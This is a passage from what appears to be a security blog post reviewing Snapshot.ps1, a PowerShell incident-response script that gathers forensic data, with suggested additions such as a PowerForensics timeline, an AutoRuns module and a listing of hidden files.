That said, if you must make the script run faster, and I mean A LOT FASTER, leave file
hashing disabled at the end of the snapshot.ps1 for a 90% reduction in run time. 
However, Jason points out that this is one of the most useful aspects of the script for identifying adversarial activity. He also points out that snapshot.ps1 is a starter script; you can and should add more commands. As an example, referring back to toolsmith #112: Red vs Blue - PowerSploit vs PowerForensics, after importing PowerForensics, you could add something like Get-ForensicTimeline | Sort-Object -Property Date | Where-Object { $_.Date -ge "12/30/2015" -and $_.Date -le "01/04/2016" } | WriteOut -FileName Timeline which would give you a file system timeline between the 12/30/2015 and 01/04/2016.But wait, there's more! Want to get autoruns without needing autorunsc.exe?  Download @p0w3rsh3ll's AutoRuns module, run Import-Module AutoRuns.psm1, then Get-Command -Module AutoRuns to be sure the module is on board, and finally comment out autorunsc.exe -accepteula -a -c | Out-File -FilePath AutoRuns.csv then add Get-PSAutorun | WriteOut -FileName AutoRuns.
It's then as simple as running .\Snapshot.ps1 and watch your computer-named directory populate, 0V3RW4TCH-2016-10-31-9-7 in my case, per Figure 1.

Figure 1: Snapshot.ps1 run
Most result files are written in machine-readable XML, CSV, and TXT, as well as REG files generated by the registry exports via reg.exe.
A great example of a results file, is spawned via dir -Path c:\ -Hidden -Recurse -ErrorAction SilentlyContinue | Select-Object FullName,Length,Mode,CreationTime,LastAccessTime,LastWriteTime | Export-Csv -Path FileSystem-Hidden-Files.csv. The resulting CSV is like a journey down evil memory lane, where all the nuggets I've tested in the past leave artifacts. This would be EXACTLY what you would be looking for under real response scenarios, as seen in Figure 2.

Figure 2: Snapshot.ps1 grabs hidden files
Sure, there are bunches of related DFIR collection scripts, but I really like this one, and plan to tweak it further. Good work from Jason, and just one of many reasons to consider taking SEC505, or pursuing your GSE!
Cheers...until next time.